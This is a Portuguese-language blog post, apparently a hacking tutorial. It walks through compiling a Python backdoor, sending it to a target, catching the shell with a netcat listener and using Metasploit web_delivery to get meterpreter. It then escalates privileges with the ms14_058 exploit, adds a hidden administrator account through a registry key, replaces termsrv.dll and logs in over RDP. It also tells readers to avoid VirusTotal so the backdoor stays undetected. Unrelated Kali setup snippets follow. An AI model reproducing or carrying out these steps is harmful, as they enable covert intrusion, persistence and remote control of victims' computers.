Pular para o conteúdo principal

simple Backdoor Python privilege Escalation add User Hide add DLL simultaneous Remote Desktop


1 - Verifique seu ip, você pode usar esse script em python: https://github.com/msOlivers/PacketofScripts/tree/master/myIpPython ou em http://whatismyipaddress.com/
2 - Baixe o Simples Backdoor em:
  • https://github.com/msOlivers/PacketofScripts/tree/master/simpleBackdoorPython 
  • Edite as linhas HOST com seu IP e a PORT com  uma de sua preferencia
ATENÇÃO:
Use judiciously
Do NOT upload VirusTotal or similiar websites
Do NOT upload public websites
Do NOT send the file via e-mail

Not following the above rules may result  in:
Your tests might be compromised
--------------------------------------------------------
Use criteriosamente
NÃO faça upload do arquivo para VirusTotal ou sites parecidos
NÃO carregue o arquivo para sites públicos
NÃO enviar o arquivo via e-mail

Não seguir as regras acima pode resultar em:
Seus testes pode ser comprometido

3 - Compile para exe usando py2exe, Como instalar o python e py2exe:
  • https://www.youtube.com/watch?v=qDYkxGdhPkw
4 -Envie para o alvo
5 - Execulte o netcat modo de esculta:
  • nc -lvp numeroDaPorta
6 - Execulte o msfconsole com o exploit web delivery para ter uma sessão meterpreter para tentamos Escalonamento de privilégios
  • Resource: https://github.com/msOlivers/PacketofScripts/blob/master/web_delivery/web_delivery.rc
  • edite com suas configurações
  • execulte com msfconsole -r nome do seu recurso.rc -q
  • aguarde e copie o resultado web delivery
7 -  Na conexão com o netcat cole o comando obtido do web Delivery e aperte enter para execultar o exploit
8 - Va para o terminal do msfconsole e veja uma nova sessaão e entre nela para fazer a Escalonamento de privilégios, Comandos:
  • sessions -i 1
  • meterpreter > sysinfo - ver infomacao do alvo
  • meterpreter > getsystem - ver privilegios
  • meterpreter > getuid - ver nivel de usuario
9 - Fazendo Escalonamento de privilégios, comandos:
  • meterpreter > background
  • msf exploit(web_delivery) > use exploit/windows/local/ms14_058_track_popup_menu
  • msf exploit(ms14_058_track_popup_menu) > set SESSION 1
  • msf exploit(ms14_058_track_popup_menu) > set TARGET 0
  • msf exploit(ms14_058_track_popup_menu) > set ExitOnSession false
  • msf exploit(ms14_058_track_popup_menu) > set LHOST SEU_IP
  • msf exploit(ms14_058_track_popup_menu) > set LPORT SUA_PORTA
  • msf exploit(ms14_058_track_popup_menu) > run
Se sucesso o Escalonamento de privilégios você obtera nova sessão já ativada
10 - Adicionar um novo usuario oculto no alvo, Comando:
  • meterpreter > shel
  • cmd > net user NovoUsuario Senha_Usuario /add
  • cmd > net localgroup Administradores NovoUsuario /add
  • cmd > reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v NovoUsuario /t REG_DWORD /d 0 /f
  • cmd > exit
11 - upload DLL para habilitar Usuário Simultâneo em Área de Trabalho Remota, Comandos
 - Obtenha a DLL(para windows 32 bits) no link: http://www.4shared.com/file/MLfeIwoeba/termsrv.html
  • meterpreter > pwd
  • meterpreter > cd ..
  • meterpreter > upload /root/termsrv.dll termsrv.dll
  • meterpreter > shell
  • cmd > MOVE /Y "%SYSTEMROOT%\system32\termsrv.dll" "%systemdrive%\termsrv.bak"
  • cmd > MOVE /Y termsrv.dll "C:\Windows\system32\
12 - Obtendo conexão RDP com o novo usuario, em um novo terminal Comando:
  • xfreerdp /v:192.168.1.6 /u:NovoUsuario /w:800 /h:600
  • https://github.com/FreeRDP/FreeRDP - para mais informação
Have Fun

Não negue conhecimento, Compartilhe essa ideia com mais pessoas, para que outros possam aprender

Video

Comentários

Postagens mais visitadas deste blog

pós-Instalação kali Linux - Instalando ARCH THEME

Olá Pessoal Eu estou fazendo uma serie de videos sobre pós-Instalação do kali Linux Voces iram acompanha os meus passo do que eu faço com uma nova instalação Video 2 - Instalando ARCH THEME   Comando $ echo 'deb http://download.opensuse.org/repositories/home:/Horst3180/Debian_8.0/ /' >> /etc/apt/sources.list.d/arc-theme.list $ wget http://download.opensuse.org/repositories/home:Horst3180/Debian_8.0/Release.key $ apt-key add - < Release.key $ apt-get update $ apt-get install arc-theme Fonte: https://software.opensuse.org/download.html?project=home%3AHorst3180&package=arc-theme

pós-Instalação kali Linux - apt-get update && apt-get upgrade

Olá Pessoal Eu estou fazendo uma serie de videos sobre pós-Instalação do kali Linux Voces iram acompanha os meus passo do que eu faço com uma nova instalação Video 1 - Atualização do sistema, segui o video abaixo: Informações extras gedit é o editor oficial de texto plano para o GNOME. Ele assemelha-se, a princípio, com o bloco de notas do Windows, mas observando os detalhes pode-se notar que possui mais recursos. Como por exemplo: Numeração de linhas. Fonte : https://pt.wikipedia.org/wiki/Gedit source.list : Um arquivo muito importante para o sistema APT de Debian é /etc/apt/sources.list. Neste arquivo são indicadas as fontes de onde serão obtidos os pacotes de software a serem instalados no sistema. Fonte : http://www.tutoriaisti.com.br/sistemas-operacionais/linux/debian-arquivos-sources-list/ source.list Kali Linux http://docs.kali.org/general-use/kali-linux-sources-list-repositories apt-get update - Atualiza a lista de pacotes e programas que podem ser insta...

pós-Instalação kali Linux - VLC error - Adobe FlashPlayer

Olá Pessoal Eu estou fazendo uma serie de videos sobre pós-Instalação do kali Linux Voces iram acompanha os meus passo do que eu faço com uma nova instalação Video 4 - Corrigindo error VLC + Instalndo AdobeFlashPlayer Comando para o corrigir o VLC $ sed -i 's/geteuid/getppid/' /usr/bin/vlc Comando para AdobeFlashPlayer $ tar -xf flash_player_npapi_linux.x86_64.tar.gz $ ls $  mv  LGPL /usr/lib/mozilla/plugins/ $  mv  libflashplayer.so /usr/lib/mozilla/plugins/ $  mv  usr /usr/lib/mozilla/plugins/ $  ls /usr/lib/mozilla/plugins/ Reiniciar o navegador e Pronto